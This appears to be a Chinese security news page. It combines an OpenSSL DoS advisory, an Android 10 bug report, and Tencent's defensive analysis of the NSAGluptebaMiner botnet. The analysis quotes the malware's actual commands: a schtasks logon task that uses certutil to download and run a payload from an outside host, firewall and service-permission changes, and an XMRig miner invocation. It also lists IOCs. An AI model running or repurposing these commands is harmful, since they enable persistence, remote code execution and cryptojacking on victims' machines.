OpenSSL 项目发布安全公告,披露了一个影响 OpenSSL v1.1.1d、1.1.1e 和 1.1.1f 的高危漏洞。该漏洞可被用于发动拒绝服务攻击。开发者称,在 TLS 1.3 握手期间或之后调用 SSL_check_chain() 函数的服务器或客户端应用可能会发生崩溃,原因是不正确处理 signature_algorithms_cert 扩展导致的空指针引用。 受影响的 OpenSSL 1.1.1 版本需要尽可能快的升级到  1.1.1g。该漏洞是 Bernd Edlinger 发现的,他在 4 月 7 日报告给 OpenSSL 项目。两周内释出补丁称得上很迅速了。   (稿源:solidot,封面源自网络。)

挖矿僵尸网络 NSAGluptebaMiner 利用永恒之蓝漏洞传播

感谢腾讯御见威胁情报中心来稿! 原文链接:https://mp.weixin.qq.com/s/mdgGiYwb722GuE6QtJTzPQ   一、概述 腾讯安全威胁情报中心检测到挖矿僵尸网络NSAGluptebaMiner变种正在利用永恒之蓝漏洞攻击传播。目前该僵尸网络会控制机器进行门罗币挖矿和搜集用户隐私数据,并具有远程执行命令的功能,同时还会利用比特币交易数据更新C2。 cloudnet.exe原来是Glupteba恶意木马,Glupteba最早作为Operation Windigo组织用于部署僵尸网络中的一部分首次出现,2018年6月腾讯安全威胁情报中心发现cloudnet.exe开始作为挖矿僵尸网络NSAGluptebaMiner的组件传播。 当前NSAGluptebaMiner版本具有以下特征: 利用永恒之蓝漏洞攻击传播; 安装计划任务实现持久化,任务利用certutil.exe下载木马; 利用密码提取器updateprofile.exe搜集浏览器记录的账号密码并上传; 绕过UAC,以管理员权限和系统权限运行,将木马程序加入防火墙策略白名单、Windows Defender查杀白名单; 安装驱动Winmon.sys、WinmonFS.sys、WinmonProcessMonitor.sys对木马进行保护; 运行门罗币挖矿程序wup.exe; 利用组件cloudnet.exe构建僵尸网络; 连接远程服务器,接收指令完成远控操作; 通过比特币交易数据更新C2地址。 二、详细分析 漏洞攻击成功后,Payload首先下载app.exe在内存中执行PE文件,并且将该文件释放到C:\Windows\rss\csrss.exe,csrss.exe是一个木马下载器,采用Go编程语言编写。 下载器首先获取当前应用程序信息、安装杀软信息、操作系统信息、硬件GPU、是否Admin用户,以及一些以二进制形式硬编码的信息来初始化“配置信息”,然后创建一个注册表项HKEY_CURRENT_USER\Software\Microsoft\<random>(8位随机字符)来存储所有获取的信息。(之前注册表为HKEY_USERS\ <sid>\Software\Microsoft\TestApp) 首先会检测是否在虚拟机中执行。 然后判断是否是系统权限,如果不是则通过以TrustedInstaller运行自己提高权限。 在”C:\Windows\System32\drivers\”目录下释放三个隐藏的sys文件,并加载对应的驱动程序: Winmon.sys用于隐藏对应PID进程; WinmonFS.sys隐藏指定文件或目录; WinmonProcessMonitor.sys查找指定进程,并关闭。 维护以系统服务的方式启动的木马(检查服务、下载安装服务、更新服务、删除服务)。 下载永恒之蓝漏洞漏洞利用程序,利用漏洞攻击局域网机器。 下载矿机和挖矿代理配置信息。 获取Glupteba僵尸网络代理程序Cloudnet.exe使用的下载地址和hash。 在handleCommand函数中实现后门功能,包括下载文件、程序执行等。 各函数及对应操作如下: 函数 操作 GetAppName 获取App名 IsAdmin 是否Admin账号 ProcessIsRunning 进程是否运行 Update 更新 Exec 执行程序 Download 下载 DownloadAndRun 下载并执行 DownloadAndRunExtended 下载并执行扩展 Exit 退出 UpdateData 更新数据 UpdateCloudnet 更新cloudnet.exe StopWUP 停止挖矿程序wup.exe UpdateService 更新服务 GetLogfileProxy 读取日志文件\proxy\t GetLogfileI2Pd 读取日志文件\i2pd\i2pd.log Notify 开启心跳包,在指定的时间间隔进行上报 NotifyHost 上报主机 EventExists 判断event是否存在 MutexExists 判断Mutuex是否存在 RegistryGetStartup 注册自启动项 VerifySignature 验证文件签名 RegistryGetStartupSignatures 验证启动项文件签名 VerifyProcessesSignatures 验证进程文件签名 GetUnverifiedFiles 上报未签名的文件 GetStatsWUP 获取挖矿木马统计信息 UploadFile 上传文件 Install 下载并安装 SC 截屏 UpdateCDN 更新C2 DiscoverElectrum 使用硬编码的以太币钱包,读取区块链交易数据 DiscoverBlockchaincom 从区块链交易数据中获取加密的新的C2地址 设置防火墙规则,将csrss.exe添加到白名单: `netsh advfirewall firewall add rule name=”csrss” dir=in action=allow program=”C:\Windows\rss\csrss.exe” enable=yes` 写入windows defender规则,添Winmon、WinmonFS、WinmonProcessMonitor加到白名单: cmd.exe /C sc sdset Winmon D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)   安装名为“ScheduledUpdate”的计划任务,任务内容为:每当用户登陆时,利用certutil.exe下载app.exe,保存为scheduled.exe并运行: `schtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR “cmd.exe /C certutil.exe -urlcache -split -f https[:]//biggames.online/app/app.exe C:\Users\admin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\admin\AppData\Local\Temp\csrss\scheduled.exe /31340” /TN ScheduledUpdate /F` 灵活更新C2: 通过公开的列表查询Electrum比特币钱包服务器,使用硬编码的hash值查询对应的区块链脚本hash记录,对返回的数据进行AES解密得到新的C2地址。 组件updateprofile.exe为密码提取器,也使用Go编写,并使用UPX壳保护。 运行后搜集包括Chrome,Opera和Yandex浏览器的cookie、历史记录和其他配置文件中的账号密码,打包上传到远程服务器。 组件cloudnet.exe负责构建僵尸网络, 会读取注册表中存放的UUID进行校验,在注册表“HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\CloudNet”下写入文件版本、路径等信息,移动自身到“\cloudnet\”文件夹下,连接C2服务器,接收远控指令。 组件wup.exe负责挖矿门罗币,csrss.exe启动wup.exe时传递参数 `C:\Users\Administrator\AppData\Local\Temp\wup\wup.exe -o stratum+tcp[:]//premiumprice.shop:50001 -u d244dab5-f080-4e0d-a79c-4eeb169b351b -p x –nicehash -k –api-port=3433 –api-access-token=d244dab5-f080-4e0d-a79c-4eeb169b351b –http-port=3433 –http-access-token=d244dab5-f080-4e0d-a79c-4eeb169b351b –donate-level=1 –randomx-wrmsr=-1 –background` Temp目录下的wup.exe负责下载矿机程序和挖矿配置文件,最后执行另一同名文件C:\Users\Administrator\AppData\Local\Temp\csrss\wup\xarch\wup.exe开启挖矿,该文件由开源挖矿程序XMRig编译。   三、安全建议 企业网管可以使用腾讯T-Sec终端安全管理系统清除病毒。 也可检查以下各项,如有进行清除: 目录和文件: C:\Users\Administrator\AppData\LoCal\Temp\Csrss\smb\ C:\users\administrator\appdata\loCal\temp\Csrss\ C:\Windows\rss\Csrss.exe C:\Windows\windefender.exe C:\Windows\System32\drivers\Winmon.sys C:\Windows\System32\drivers\WinmonFS.sys C:\Windows\System32\drivers\WinmonProCessMonitor.sys C:\users\administrator\appdata\loCal\temp\Csrss\Cloudnet.exe C:\Users\Administrator\AppData\LoCal\Temp\Csrss\sCheduled.exe C:\Users\Administrator\AppData\LoCal\Temp\Csrss\updateprofile.exe C:\Users\Administrator\AppData\LoCal\Temp\wup\wup.exe C:\Users\Administrator\AppData\LoCal\Temp\Csrss\wup\xarCh\wup.exe 注册表: HKEY_CURRENT_USER\SOFTWARE\MiCrosoft\TestApp HKEY_CURRENT_USER\SOFTWARE\MiCrosoft\<random>\<random> HKEY_CURRENT_USER\SOFTWARE\EpiCNet InC.\CloudNet HKEY_CURRENT_USER\Software\MiCrosoft\<random> HKEY_LOCAL_MACHINE\System\CurrentControlSet\ServiCes\Winmon HKEY_LOCAL_MACHINE\System\CurrentControlSet\ServiCes\WinmonFS HKEY_LOCAL_MACHINE\System\CurrentControlSet\ServiCes\WinmonProCessMonitor HKEY_USERS\sid\Software\MiCrosoft\Windows\CurrentVersion\Run\DeliCateFrost 计划任务: ScheduledUpdate IOCs Domain biggames.club biggames.online deepsound.live sndvoices.com 2makestorage.com infocarnames.ru URL http[:]//biggames.club/app/app.exe https[:]//infocarnames.ru/ru53332/-RTMD-AIyBxl2ebgAAvhwCAEVTFwAfAOm6EgMA.exe md5 b1c081429c23e3ef0268fd33e2fe79f9 da75bc9d4d74a7ae4883bfa66aa8e99b 00201e5ad4e27ff63ea32fb9a9bb2c2e 6918fd63f9ec3126b25ce7f059b7726a fcf8643ff7ffe5e236aa957d108958c9 9b47b9f19455bf56138ddb81c93b6c0c 0dbecc91932301ccc685b9272c717d61 矿池: premiumprice.shop:50001 参考链接 https://www.freebuf.com/articles/system/172929.html https://blog.trendmicro.com/trendlabs-security-intelligence/glupteba-campaign-hits-network-routers-and-updates-cc-servers-with-data-from-bitcoin-transactions/

Android 10 被曝 Bug:APP 无响应

4月21日消息,据Android Police报道,近期不少人反映谷歌Pixel手机在运行部分APP时经常出现无响应的情况。报道指出,这是Android 10系统存在的Bug,该Bug不仅影响了谷歌Pixel设备,其它手机品牌也受到了不同程度的影响。 当APP出现无响应情况时,整个系统也会受到影响,导致整个系统不能操作,自然也就无法退出该应用程序,只能是强制锁屏,然后再解锁进入。 Android Police称该场景出现频率较高,一天可能要发生多次。受此影响的APP有YouTube、Twitter、亚马逊、YouTube音乐、Google Play商店等等。 更糟糕的是,这个Bug也影响到了Android 11。外媒发现运行Android 11开发者预览版的Pixel 3也同样遇到了这个问题,这说明Android 11开发版上有可能引入了Android 10稳定版上的错误代码。 目前Android Police已经与谷歌取得联系,但是谷歌尚未对此作出回应,预计问题会在下一版更新中解决。   (稿源:cnBeta,封面源自网络。)